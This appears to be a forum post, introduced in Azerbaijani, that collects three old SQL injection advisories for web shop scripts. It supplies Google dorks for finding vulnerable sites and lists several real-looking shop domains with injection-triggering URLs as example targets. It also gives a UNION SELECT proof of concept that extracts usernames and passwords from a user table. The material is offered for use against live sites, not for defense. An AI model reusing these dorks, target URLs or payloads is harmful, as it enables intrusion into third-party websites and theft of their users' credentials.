Shop Script SQL Injection dork təqdim edirəm.
Kod:
# Exploit Title: Shop Script SQL Injections Vulnerability
# Type : PHP
# Date: 23-05-2010
# Author: fatal.001
# Dork: inurl:"step1.php?number="
Or
# Dork: inurl:"/shop/step1.php?number="
http://crobidolls.com/shop/step1.php?number=1186'
http://www.dimdoll.com/shop/step1.php?number=222'
http://www.iplehouse.net/shop/step1.php?number=2026'
http://musedoll.com/shop/step1.php?number=568'
Kod:
_____ ______ _____ _____ ______ _______
/ ____| ____/ ____| __ \| ____|__ __|
| (___ | |__ | | | |__) | |__ | |
\___ \| __|| | | _ /| __| | |
____) | |___| |____| | \ \| |____ | |
|_____/|______\_____|_| \_\______| |_|
# Exploit Title: System Shop SQL Injection - Module aktkat=
# Date: 12.09.2010
# Author: secret
# Software Link: www.system-shop.at
# Version: latest version
# Tested on: XP / Linux
#Dorks : inurl:"aktkat" / "Powered by System Shop" / "System Shop" site:at
SQL Injection :
===========================================================================================
Simple Error Based / Normal SQL Injection in "aktkat="
e.g. http://server/kn.php?aktkat=16 [SQL INJECTION] / columns vary..
NOT FIXED - 12.09.2010
Kod:
==============================================
Boybdream Shop Sql Injection Vulnerability
==============================================
[+] Author : Bl4ck.Viper
[+] Mail : Bl4ck.Viper@gmail.com
[+] Vender : http://www.boybdream.com/
[+] Dork : inurl:"shoppage.php?shopid="
==============================================
Err0r: shoppage.php Line 9
Demo:
http://www.pralanna.com/shoppage.php?shopid=119197
Poc:
http://Target.com/shoppage.php?shopid=119197 union select 1,2,username,password,5,6,7,8,9,10,11 from user limit 1,1--
===
